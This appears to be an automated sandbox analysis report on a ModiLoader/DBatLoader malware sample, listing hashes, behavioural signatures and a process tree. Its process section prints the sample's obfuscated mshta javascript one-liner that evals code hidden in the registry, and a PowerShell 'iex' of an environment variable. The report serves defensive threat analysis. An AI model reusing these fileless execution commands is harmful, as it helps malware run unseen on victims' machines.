Analysis

max time kernel: 188s
max time network: 193s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/10/2022, 13:50
Static task: static1

Behavioral task: behavioral1
Sample: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe

Behavioral task: behavioral2
Sample: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
Resource: win10v2004-20220812-en
General

Target: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
Size: 368KB
MD5: 67d6382ea5ca9b2639cdb23866f45c79
SHA1: 4a94eb49084446cefb9db775ba7fa0452a3e4afe
SHA256: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af
SHA512: 09eef1d438aee77854826e1fbd07f83b67e9620ca10a5af0d756456a822aa2a9c03a6d181c15f9ac511d87f0151643a83ec991438aba8878f2696acd751ff5ab
SSDEEP: 6144:iHhS4AwWPUAEibLJl7UO7Sg9csjq41rNA3hyGMghRaoK4tyZg2ZLX/MAq+gMl7C:iBjANUAx3j7UV4/AxThooK0yZZ9/Lq+c
Malware Config
Signatures

- ModiLoader, DBatLoader
  ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 2796  pid_target: 2156  Process: mshta.exe  procid_target: 31

- ModiLoader Second Stage (3 IoCs)
  resource: behavioral2/memory/5020-133-0x0000000000400000-0x0000000000462000-memory.dmp  yara_rule: modiloader_stage2
  resource: behavioral2/memory/5020-136-0x0000000000060000-0x0000000000120000-memory.dmp  yara_rule: modiloader_stage2
  resource: behavioral2/memory/5020-144-0x0000000000060000-0x0000000000120000-memory.dmp  yara_rule: modiloader_stage2

- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation
  Process: mshta.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid: 4084  Process: powershell.exe
  pid: 4084  Process: powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege  pid: 4084  Process: powershell.exe

- Suspicious use of FindShellTrayWindow (2 IoCs)
  pid: 5020  Process: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
  pid: 5020  Process: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe

- Suspicious use of SendNotifyMessage (2 IoCs)
  pid: 5020  Process: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
  pid: 5020  Process: 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe

- Suspicious use of WriteProcessMemory (3 IoCs)
  description: PID 2796 wrote to memory of 4084  pid: 2796  Process: mshta.exe  procid_target: 82
  description: PID 2796 wrote to memory of 4084  pid: 2796  Process: mshta.exe  procid_target: 82
  description: PID 2796 wrote to memory of 4084  pid: 2796  Process: mshta.exe  procid_target: 82
Processes

- C:\Users\Admin\AppData\Local\Temp\659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe (PID: 5020)
  Command line: "C:\Users\Admin\AppData\Local\Temp\659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe"
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

- C:\Windows\system32\mshta.exe (PID: 2796)
  Command line: "C:\Windows\system32\mshta.exe" javascript:IZPvXY1="RNJuxt";d7k=new%20ActiveXObject("WScript.Shell");CxxfG7oe="2DdkeE";It1jH2=d7k.RegRead("HKLM\\software\\Wow6432Node\\N0JiJTc1\\L0euKr");o0HcgDH="Vd";eval(It1jH2);cErvbt4P="e5IKaZ7Mn";
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 4084, child of mshta.exe)
    Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:jocjzbu
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken